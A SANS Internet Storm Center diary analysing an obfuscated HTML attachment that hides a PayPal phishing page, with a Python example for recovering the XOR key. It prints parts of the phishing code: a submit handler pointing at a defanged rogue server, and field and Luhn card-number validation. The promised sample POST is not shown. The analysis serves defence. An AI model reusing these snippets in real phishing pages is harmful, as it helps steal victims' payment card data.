SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center


Nicely Obfuscated JavaScript Sample

Published: 2017-03-24
Last Updated: 2017-03-24 11:45:23 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. A manual look at the file shows that it is heavily obfuscated, with the whole payload encoded in a single variable:

var iKz7xb8 = "160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416
4b47434653100a0d784548455e450d060a5 ... ";
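The hex above is the page XORed with a single key byte: with key 0x2a it decodes to `<!DOCTYPE HTML><html lang="en"><head><`. The following Python is an added example (mine, not the diary's nor JSDetox's) that recovers such a key by brute force and scoring, using the part of the variable reproduced above as its input; the marker list and the printability threshold are my assumptions.

```python
import re
import string

# Leading bytes of the obfuscated variable as printed in the diary (the rest is truncated there).
SAMPLE_HEX = "160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416"

PRINTABLE = set(bytes(string.printable, "ascii"))
# Assumed markers one expects in a decoded HTML/JS payload (my heuristic, not from the diary).
HTML_MARKERS = (b"<!doctype", b"<html", b"<head", b"<script", b"<form")


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one key byte."""
    return bytes(b ^ key for b in data)


def score_plaintext(candidate: bytes):
    """Rank a candidate by (HTML markers found, fraction of printable bytes); a higher tuple wins."""
    if not candidate:
        return (0, 0.0)
    lowered = candidate.lower()
    hits = sum(1 for m in HTML_MARKERS if m in lowered)
    printable = sum(1 for b in candidate if b in PRINTABLE) / len(candidate)
    return (hits, printable)


def recover_xor_key(hex_blob: str):
    """Try all 256 single-byte keys; return (key, decoded_bytes, score) for the best-scoring one."""
    data = bytes.fromhex(re.sub(r"\s+", "", hex_blob))
    best = None
    for key in range(256):
        plain = xor_single_byte(data, key)
        score = score_plaintext(plain)
        if best is None or score > best[2]:
            best = (key, plain, score)
    return best


def looks_like_encoded_html(hex_blob: str) -> bool:
    """Triage check for a mail gateway or sandbox: does the blob decode to HTML under some key?"""
    _, _, (hits, printable) = recover_xor_key(hex_blob)
    return hits >= 1 and printable >= 0.95


if __name__ == "__main__":
    key, plain, _ = recover_xor_key(SAMPLE_HEX)
    print("key=0x%02x decoded=%r" % (key, plain.decode("ascii", "replace")))
```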

The file has a current VT score of 0/55 [1] and is "free" of malicious code: it is just a very nice PayPal phishing page:

The HTTP form data are sent to a rogue server, but how do we find it? The malicious JavaScript can be de-obfuscated with JSDetox [2] plus some manual changes, after which the complete code can be reviewed. The following function does the job:

<input type="button" class="ssP" onClick="ss()" value="Submit Form">
function ss(){
    if (!TLSPort()){
        return false;
    }
    var GoogleAnalytics="hxxp://" + "86c2e66377265675a8a0edc1befe1837.php";
    // ... remainder of the function not reproduced in the diary
}

The TLSPort() function is just a validation function:

function TLSPort(){
    var CV=CValid(document.pF.pCC.value);
    if (!CV) return 0;
    var x=document.pF.pFN.value,y=document.pF.pEM.value,z=document.pF.pEY.value; // the declarations of v and w are cut off in the extracted snippet
    if (!v || !w || !x || y=="00" || z=="00") return 0;
    return 1;
}

CValid() is used to verify the credit card number provided by the victim:

function CValid(x){
    if (/[^0-9-\s]+/.test(x)) return false;   // only digits, dashes and whitespace allowed
    var nn=0,nd=0,be=false;x=x.replace(/\D/g, "");   // strip everything but digits
    for (var n=x.length - 1; n >=0; n--){   // Luhn checksum, walking from the rightmost digit
        var cd=x.charAt(n),nd=parseInt(cd, 10);
        if (be){
            if ((nd *=2) > 9) nd -=9;
        }
        nn +=nd;be=!be;
    }
    return (nn % 10)==0;
}

Here is a valid POST to the attacker's server (using the test Visa number 4111111111111111 and fake data):


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

